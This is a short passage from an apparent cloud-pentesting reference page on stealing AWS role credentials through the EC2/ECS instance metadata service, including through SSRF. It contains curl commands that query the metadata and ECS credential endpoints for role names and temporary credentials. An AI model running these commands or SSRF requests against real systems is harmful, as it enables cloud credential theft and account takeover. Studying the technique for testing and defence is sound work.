Instance metadata

Every EC2 instance and ECS task with a role reaches its credentials through the link-local metadata endpoint at 169.254.169.254. Anything that can make an HTTP request from the instance, a shell, a vulnerable web app, or an SSRF, can ask the metadata service for the role's temporary credentials and walk away as that role.

What folds in here#

  • IMDSv1: the unauthenticated GET endpoint, the easiest case.
  • IMDSv2: the token-first flow and what it takes to satisfy it.
  • SSRF: reaching the endpoint through a server-side request forgery in an application.

The endpoint#

bash
# role name, then its credentials (IMDSv1 form)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>
# ECS task role uses a different path
curl http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI

References#

Cookie Consent

We use cookies to enhance your experience. Learn more